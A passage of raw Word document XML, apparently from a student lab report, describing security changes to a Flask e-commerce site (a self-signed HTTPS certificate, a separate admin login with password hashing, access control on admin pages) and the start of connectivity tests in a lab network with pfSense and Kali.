    <w:p w14:paraId="4DD10BD9" w14:textId="77777777" w:rsidR="009D078A" w:rsidRDefault="009D078A" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4BE4D5" w14:textId="77777777" w:rsidR="009D078A" w:rsidRDefault="009D078A" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2A0C5E" w14:textId="77777777" w:rsidR="009D078A" w:rsidRDefault="009D078A" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="263286C8" w14:textId="77777777" w:rsidR="00A40517" w:rsidRDefault="00A40517" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7CD6ED" w14:textId="708E8288" w:rsidR="00306832" w:rsidRDefault="00A861C7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4: SECURITY BASED </w:t>
      </w:r>
      <w:r w:rsidR="00306832">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ALTERATIONS MADE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44786201" w14:textId="2428A0F0" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>After a meeting with the client</w:t>
      </w:r>
      <w:r w:rsidR="009D078A">
        <w:t xml:space="preserve"> (10/02/2022)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00464245">
        <w:t>The request was made, that, if possible, the site should be upgraded to run using HTTPS as apposed to the HTTP of the current deployment. The following alterations were made to address this request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595493D5" w14:textId="1AB38631" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The server will run using</w:t>
      </w:r>
      <w:r w:rsidR="00464245">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> self-sign</w:t>
      </w:r>
      <w:r w:rsidR="00464245">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ssl certificate as it </w:t>
      </w:r>
      <w:r w:rsidR="00464245">
        <w:t>only exist inside a closed, isolated network environment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00464245">
        <w:t>and therefor inaccessible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by public network</w:t>
      </w:r>
      <w:r w:rsidR="00464245">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB8398F" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The new certificate is created with openssl using a 2048 rsa encryption method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6284DAFE" w14:textId="3ECC9DE6" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73AA815A" wp14:editId="737DDE78">
            <wp:extent cx="5607050" cy="3784600"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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7050" cy="3784600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD23D62" w14:textId="7F77B1E5" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>the ssl module must be enabled in Apache and the default configuration disable</w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t>d.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25899CCA" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:object w:dxaOrig="8110" w:dyaOrig="1100" w14:anchorId="6F314178">
          <v:shape id="_x0000_i1032" type="#_x0000_t75" style="width:405.5pt;height:55pt" o:ole="">
            <v:imagedata r:id="rId59" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1032" DrawAspect="Content" ObjectID="_1710221372" r:id="rId60"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE94B14" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="603948FE" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="1DBDAE0F" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="5EA5A9FB" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="32111F41" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="5EB2E119" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="341A0515" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="28EA3D23" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="31885E26" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="62585701" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="053560C8" w14:textId="77777777" w:rsidR="008209A8" w:rsidRDefault="008209A8" w:rsidP="00306832"/>
    <w:p w14:paraId="2B50B019" w14:textId="2DF0AD4E" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The new configuration of the e-commerce uses the ssl engine with the file and key previously created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51808A32" w14:textId="4D23FA07" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FA98876" wp14:editId="34737A34">
            <wp:extent cx="4514850" cy="3594100"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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14850" cy="3594100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B427535" w14:textId="6A644E15" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t xml:space="preserve">The flask web app is </w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t>now</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> accessible on port 443(HTTPS protocol using the 2048 rsa certificate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F975250" w14:textId="77777777" w:rsidR="00306832" w:rsidRPr="008209A8" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008209A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrator login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3D9BA7" w14:textId="5B726266" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The administrator has a separate login</w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t>. This was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> previously missing from the page, </w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t xml:space="preserve">where </w:t>
      </w:r>
      <w:r>
        <w:t>a user ha</w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the option to log in as</w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> administrator only i</w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> logged out as </w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>mer</w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058958A6" w14:textId="49322081" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35E4F80D" wp14:editId="52FCD988">
            <wp:extent cx="5734050" cy="1301750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Picture 2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video game&#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1301750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="011A78E7" w14:textId="216CB6F1" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The login of the admin no longer use</w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> email address</w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t>(as it did by default)</w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instead</w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t>, now a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>sername and password</w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t xml:space="preserve"> combined with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encryption</w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>has be</w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t>en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> implemented to allow password hashing</w:t>
      </w:r>
      <w:r w:rsidR="008209A8">
        <w:t>. This not only goes some way to securing the admin account but will also give us an attack vector for later use in a brute force attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9CE9EA" w14:textId="58E92303" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C0CD4C1" wp14:editId="52065B4B">
            <wp:extent cx="5734050" cy="1504950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="Picture 2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phical user interface, application, websit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1504950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C6B875" w14:textId="77777777" w:rsidR="00306832" w:rsidRPr="000602E7" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000602E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrator pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9F4F05" w14:textId="12C898FF" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Previously</w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> each admin page could </w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> access</w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by anyone without any administration user verification. The navigation bar has also been updated, to allow the admin to register </w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:t>other administrator, and access to products, brands and categor</w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA77005" w14:textId="7BF77EFE" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="034AB547" wp14:editId="11BF8900">
            <wp:extent cx="5727700" cy="1187450"/>
            <wp:effectExtent l="0" t="0" r="635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phical user interface, applicatio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1187450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B815DBD" w14:textId="77777777" w:rsidR="00306832" w:rsidRPr="000602E7" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000602E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Costumer’s page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF5E10C" w14:textId="6D1C7694" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t xml:space="preserve">Once the costumer logged in, a new option for adding </w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>their own</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> product to the website has been implemented, to complete the cart and payment the costumer must be logged in</w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC7447B" w14:textId="6A89B5E8" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64190B01" wp14:editId="4F90368E">
            <wp:extent cx="5727700" cy="901700"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="20" name="Picture 2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aphical user interface, application, websit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901700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9AE239" w14:textId="77FDF509" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Finally, the template website from the GitHub page had many bugs, syntactically and logical errors that have been fixed to allow a complete user experience to the e-commerce</w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11025800" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DDE275A" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556D1E7A" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="173B4A56" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4AE9F2" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D0D67A" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE607C4" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E39D94E" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D93249C" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB0A3E8" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AC59264" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033D018F" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC3E4FE" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57876100" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6670F42D" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39538693" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A1495EC" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28882D45" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F768244" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B6EF7E" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20DB8D3B" w14:textId="77777777" w:rsidR="000602E7" w:rsidRDefault="000602E7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E57FBE" w14:textId="62443340" w:rsidR="00306832" w:rsidRDefault="00A861C7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5: </w:t>
      </w:r>
      <w:r w:rsidR="00306832">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FINAL TESTING</w:t>
      </w:r>
      <w:r w:rsidR="000602E7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> OF INITIAL CONFIGURATION</w:t>
      </w:r>
      <w:r w:rsidR="00306832">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754CE30B" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Connectivity test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF1795" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>From Ubuntu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552868E6" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-To google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4D1B1F" w14:textId="26820C1E" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FC817A2" wp14:editId="4148F23E">
            <wp:extent cx="4616450" cy="15875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6450" cy="1587500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B162663" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-To Pfsense (DMZ interface)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB91A9" w14:textId="5E01C9AF" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A3F6C68" wp14:editId="5952F159">
            <wp:extent cx="3644900" cy="11684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4900" cy="1168400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9FD73D" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-To kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1106A3" w14:textId="38D7EF98" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E2EA15B" wp14:editId="0C8DD959">
            <wp:extent cx="3644900" cy="10541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4900" cy="1054100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E38A65B" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-Web e-commerce HTTPS enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E52D6BD" w14:textId="1D9F6348" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
